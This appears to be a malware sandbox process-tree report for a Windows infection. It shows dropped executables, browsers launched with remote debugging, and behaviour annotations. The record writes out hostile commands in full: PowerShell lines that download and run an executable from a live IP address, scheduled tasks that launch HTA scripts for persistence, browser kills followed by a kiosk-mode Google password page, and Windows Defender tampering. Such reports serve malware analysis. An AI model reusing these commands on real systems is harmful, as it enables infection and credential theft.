C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1992 /prefetch:26⤵PID:5332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2240 /prefetch:36⤵PID:540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2292 /prefetch:86⤵PID:4392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3284 /prefetch:16⤵
- Uses browser remote debugging
PID:2272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3264 /prefetch:16⤵
- Uses browser remote debugging
PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4296 /prefetch:26⤵
- Uses browser remote debugging
PID:4688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4612 /prefetch:16⤵
- Uses browser remote debugging
PID:2656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5176,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5188 /prefetch:86⤵PID:3976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5520 /prefetch:86⤵PID:5356
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ff81e52f208,0x7ff81e52f214,0x7ff81e52f2206⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1692,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:36⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2420,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:26⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1928,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:86⤵PID:3052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:16⤵
- Uses browser remote debugging
PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:16⤵
- Uses browser remote debugging
PID:5292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4516,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=4480 /prefetch:86⤵PID:6412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:86⤵PID:6404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5416,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:86⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5480,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:86⤵PID:5168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5480,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:86⤵PID:5820
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:7148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:7124 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ff8237cf208,0x7ff8237cf214,0x7ff8237cf2206⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1708,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:36⤵PID:6820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2480,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:26⤵PID:7096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1260,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:86⤵PID:7092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:16⤵
- Uses browser remote debugging
PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3516,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:16⤵
- Uses browser remote debugging
PID:7116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\q1n7g" & exit5⤵PID:7128
-
C:\Windows\SysWOW64\timeout.exetimeout /t 116⤵
- Delays execution with timeout.exe
PID:6852
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10348030101\3e34f7cf67.exe"C:\Users\Admin\AppData\Local\Temp\10348030101\3e34f7cf67.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 28luImanbgR /tr "mshta C:\Users\Admin\AppData\Local\Temp\ASkg3vwQn.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 28luImanbgR /tr "mshta C:\Users\Admin\AppData\Local\Temp\ASkg3vwQn.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6124
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ASkg3vwQn.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464 -
C:\Users\Admin\AppData\Local\TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE"C:\Users\Admin\AppData\Local\TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5484
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10348040121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:2860 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:5584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:4540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "T1dZMma8hHj" /tr "mshta \"C:\Temp\j4HzL6rM1.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5664
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\j4HzL6rM1.hta"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5912 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10348230101\0fbec82655.exe"C:\Users\Admin\AppData\Local\Temp\10348230101\0fbec82655.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5604
-
-
-
C:\Users\Admin\AppData\Local\Temp\10348240101\108394fe3e.exe"C:\Users\Admin\AppData\Local\Temp\10348240101\108394fe3e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4456
-
-
C:\Users\Admin\AppData\Local\Temp\10348250101\563e9e5edc.exe"C:\Users\Admin\AppData\Local\Temp\10348250101\563e9e5edc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6428
-
-
C:\Users\Admin\AppData\Local\Temp\10348260101\c42b585dc6.exe"C:\Users\Admin\AppData\Local\Temp\10348260101\c42b585dc6.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6880 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6116 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {6bc73408-e193-4a3b-a6c1-3c0b27f69587} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:3080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2512 -prefsLen 27135 -prefMapHandle 2516 -prefMapSize 270279 -ipcHandle 2524 -initialChannelId {3bfbf395-9d47-48c0-9b94-b78b6141cb9f} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:5832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3804 -prefsLen 25164 -prefMapHandle 3808 -prefMapSize 270279 -jsInitHandle 3812 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3856 -initialChannelId {8dd79249-d9c6-476d-af52-17b29b91b403} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:2640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4036 -prefsLen 27276 -prefMapHandle 4040 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {cd201225-1bc6-4656-b531-6e5fdaae333c} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:6440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3228 -prefsLen 34775 -prefMapHandle 3232 -prefMapSize 270279 -jsInitHandle 3192 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3308 -initialChannelId {e8eaa040-37db-4059-b1dd-70a0311b42cf} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:5124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4968 -prefsLen 35012 -prefMapHandle 4972 -prefMapSize 270279 -ipcHandle 4980 -initialChannelId {fd6b9507-4e58-4dc6-85af-e233bace88ca} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:5160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5136 -prefsLen 32952 -prefMapHandle 5140 -prefMapSize 270279 -jsInitHandle 5144 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5152 -initialChannelId {95a6a672-ceb3-49c1-aff4-48fd18be5ca4} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:4440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5268 -prefsLen 32952 -prefMapHandle 5272 -prefMapSize 270279 -jsInitHandle 5276 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5112 -initialChannelId {ef923b7f-bc5f-4e8e-8d0b-aebc35a90099} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:1988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5612 -prefsLen 32952 -prefMapHandle 5616 -prefMapSize 270279 -jsInitHandle 5620 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5624 -initialChannelId {2d50d0a5-57b8-4746-b3e1-44e496054ce3} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:6640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10348270101\ad8094dd16.exe"C:\Users\Admin\AppData\Local\Temp\10348270101\ad8094dd16.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
